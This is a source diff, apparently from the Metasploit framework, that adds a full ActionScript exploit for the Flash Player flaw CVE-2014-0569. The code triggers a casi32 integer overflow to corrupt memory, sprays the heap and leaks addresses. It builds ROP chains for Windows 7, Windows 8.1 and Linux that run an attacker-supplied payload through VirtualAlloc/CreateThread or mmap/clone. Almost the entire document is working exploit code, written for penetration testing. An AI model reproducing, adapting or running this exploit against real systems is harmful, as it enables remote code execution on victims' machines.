+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0569/Exploit.as b/external/source/exploits/CVE-2014-0569/Exploit.as
new file mode 100755
index 0000000000..bf836bf0e1
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/Exploit.as
@@ -0,0 +1,114 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Download the Flex SDK (4.6)
+// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 4. Build with: mxmlc -o msf.swf Exploit.as
+
+// It uses original code from @hdarwin89 for exploitation using ba's and vectors
+
+package
+{
+	import flash.display.Sprite
+	import flash.utils.ByteArray
+	import flash.system.ApplicationDomain
+	import avm2.intrinsics.memory.casi32
+	import flash.display.LoaderInfo
+	import mx.utils.Base64Decoder
+
+	public class Exploit extends Sprite 
+	{
+		private var BYTE_ARRAY_SIZE:Number = 1024
+		private var uv:Vector.<uint>
+		private var ba:ByteArray
+		private var b64:Base64Decoder = new Base64Decoder();
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
+		private var defrag:Vector.<Object> = new Vector.<Object>(100)
+		private var ov:Vector.<Object> = new Vector.<Object>(200)
+				
+		public function Exploit() 
+		{
+			var i:uint = 0
+			var j:uint = 0
+			
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+
+			for (i = 0; i < defrag.length; i++) {
+				defrag[i] = new ByteArray()
+				defrag[i].length = BYTE_ARRAY_SIZE
+				defrag[i].endian = "littleEndian"
+			}
+			
+			ba = new ByteArray()
+			ov[0] = ba
+			ov[0].length = BYTE_ARRAY_SIZE
+			ov[0].endian = "littleEndian"
+
+			for (i = 1; i < ov.length; i++) {
+				ov[i] = new Vector.<uint>(1014)
+				ov[i][0] = 0x41424344
+			}
+
+			ApplicationDomain.currentDomain.domainMemory = ba;
+			// Make ByteArray length 0 so the casi32 integer overflow 
+			// can be exploited
+			ba.atomicCompareAndSwapLength(1024, 0)
+			
+			try {
+				var uint_vector_pos:uint = search_uint_vector()
+			} catch (err:Error) {
+				Logger.log("Vector.<uint> not found :(")
+				return
+			}
+			
+			// Overwrite uint vector length
+			var orig_length:uint = write_byte_array(uint_vector_pos, 0xffffffff)
+			
+			for (i = 0; i < ov.length; i++) {
+				if (ov[i].length > 1024) {
+					uv = ov[i]
+					Logger.log("Vector.<uint> corrupted found :)")
+				} else {
+					ov[i] = null
+				}
+			}
+			
+			exploiter = new Exploiter(this, platform, os, payload, uv)
+		}
+		
+		// Methods to use the integer overflow
+		private function search_uint_vector(limit:uint = 0xf9000, pattern:uint = 1014):uint {
+			var mem:uint = 0
+			var mem_first_pos:uint = 0
+			
+			for (var i:uint = 0; i < limit; i = i + 4) {
+				mem = read_byte_array(i)
+				mem_first_pos = read_byte_array(i + 8)
+				if (mem == pattern && mem_first_pos == 0x41424344) {
+					return i
+				}
+			}
+			throw new Error()
+		}
+						
+		private function read_byte_array(offset:uint = 0):uint {
+			var old:uint = casi32(offset, 0xdeedbeef, 0xdeedbeef)
+			return old
+		}
+		
+		private function write_byte_array(offset:uint = 0, value:uint = 0):uint {
+			var old:uint = read_byte_array(offset)
+			casi32(offset, old, value)
+			return old
+		}
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0569/ExploitByteArray.as b/external/source/exploits/CVE-2014-0569/ExploitByteArray.as
new file mode 100755
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0569/ExploitVector.as b/external/source/exploits/CVE-2014-0569/ExploitVector.as
new file mode 100755
index 0000000000..9fcbb01f7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 1014 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0569/Exploiter.as b/external/source/exploits/CVE-2014-0569/Exploiter.as
new file mode 100755
index 0000000000..6e4eba3295
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(10000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0569/Logger.as b/external/source/exploits/CVE-2014-0569/Logger.as
new file mode 100755
index 0000000000..61ec768c25
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 1
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0569/Main.as b/external/source/exploits/CVE-2014-0569/Main.as
deleted file mode 100755
index 4ac48e2cec..0000000000
--- a/external/source/exploits/CVE-2014-0569/Main.as
+++ /dev/null
@@ -1,287 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Download the Flex SDK (4.6)
-// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 4. Build with: mxmlc -o msf.swf Main.as
-
-// Original code skeleton by @hdarwin89 for other exploits
-
-package
-{
-	import flash.display.Sprite
-	import flash.utils.ByteArray
-	import flash.system.ApplicationDomain
-	import avm2.intrinsics.memory.casi32
-	import flash.display.LoaderInfo
-	import mx.utils.Base64Decoder
-
-	public class Main extends Sprite 
-	{
-		private var BYTE_ARRAY_SIZE:Number = 1024
-		private var defrag:Vector.<Object> = new Vector.<Object>(100)
-		private var ov:Vector.<Object> = new Vector.<Object>(100)
-		private var uv:Vector.<Object> = new Vector.<Object>(100)
-		private var uv_index:uint
-		private var ba:ByteArray
-		private var b64:Base64Decoder = new Base64Decoder();
-		private var payload:String = ""
-				
-		public function Main() 
-		{
-			var i:uint = 0
-			var j:uint = 0
-			
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			payload = b64.toByteArray().toString()
-			for (i = 0; i < defrag.length; i++) {
-				defrag[i] = new ByteArray()
-				defrag[i].length = BYTE_ARRAY_SIZE
-				defrag[i].endian = "littleEndian"
-			}
-			
-			ba = new ByteArray()
-			ov[0] = ba
-			ov[0].length = BYTE_ARRAY_SIZE
